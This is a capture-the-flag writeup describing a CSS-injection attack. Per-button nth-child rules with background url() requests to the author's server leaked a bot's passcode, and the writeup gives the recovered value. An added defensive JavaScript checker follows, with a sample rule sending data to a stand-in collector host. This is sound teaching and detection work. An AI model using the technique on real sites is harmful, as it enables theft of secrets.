[https://gist.github.com/sqrtrev/e033c934444dc48d009ea3ed8dca54d3](https://gist.github.com/sqrtrev/e033c934444dc48d009ea3ed8dca54d3)

First, I tried to find a way to leak the flag via CSS through the h3 tag
(because the flag is stored in an h3 tag), something like CSS attribute selector
injection.  
But when I read the server-side code, I saw that there is a passcode which is fixed,
produced by the generate function. This function just shuffles some letters, and
the result consists of no duplicated letters.

Therefore, once we leak the passcode, we can use it again on our client side
to get the flag.  
So I used CSS's nth-child to give each button a background: url attribute
that makes a request to my server.  
After I submit my payload, the bot will send me a request for each passcode
when it clicks the buttons.

So we can get the passcode by combining the request logs.

Passcode: AD14BF65EC093728

![log](https://pbs.twimg.com/media/E30idIyVcAIADt2?format=png&name=medium)

Original writeup (https://twitter.com/sqrtrev/status/1404313247281401858).
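
From the defending side, the leak described above depends on injected CSS being allowed to fetch from a host the attacker controls. The following is an added example, not code from the original writeup or the challenge: a small checker that flags such rules in submitted CSS. The allowlist, host names, function names and sample stylesheet are all constructed for illustration.

```javascript
// Added example: flag CSS rules whose url() would fetch from a non-allowlisted host.
// ALLOWED_HOSTS and SAMPLE are constructed values, not taken from the challenge.
const ALLOWED_HOSTS = new Set(["static.example.test"]);

// Selectors that single out one element: nth-* positions and attribute matches.
const TARGETING = /:nth-(child|last-child|of-type)\(|\[[^\]]+\]/i;

// Return the remote host a url() argument points at, or null if local/allowed.
function externalHost(raw) {
  const value = raw.trim().replace(/^['"]|['"]$/g, "");
  if (/^data:/i.test(value)) return null; // inline data, no network request
  let u;
  try {
    // Relative URLs resolve against a placeholder origin and count as local.
    u = new URL(value, "https://origin.invalid/");
  } catch {
    return "(unparseable)";
  }
  if (u.hostname === "origin.invalid" || ALLOWED_HOSTS.has(u.hostname)) return null;
  return u.hostname || null;
}

// Scan flat (non-nested) rules and report every remote fetch with its selector.
function findRemoteFetchRules(css) {
  const findings = [];
  const stripped = css.replace(/\/\*[\s\S]*?\*\//g, ""); // drop comments first
  for (const [, selector, body] of stripped.matchAll(/([^{}]+)\{([^{}]*)\}/g)) {
    for (const [, arg] of body.matchAll(/url\(\s*([^)]*?)\s*\)/gi)) {
      const host = externalHost(arg);
      if (host) {
        findings.push({ selector: selector.trim(), host, targeted: TARGETING.test(selector) });
      }
    }
  }
  return findings;
}

const SAMPLE = `
/* constructed sample stylesheet */
.btn { background: url(/img/btn.png); }
button:nth-child(3) { background: url("https://collector.example.test/k?c=3"); }
h3 { background-image: url(//static.example.test/bg.png); }
`;

console.log(findRemoteFetchRules(SAMPLE));
```

A finding with `targeted: true` is the pattern from this writeup: a per-element rule whose only visible effect is an outbound request. A restrictive `img-src` Content-Security-Policy blocks the same fetch at the browser level.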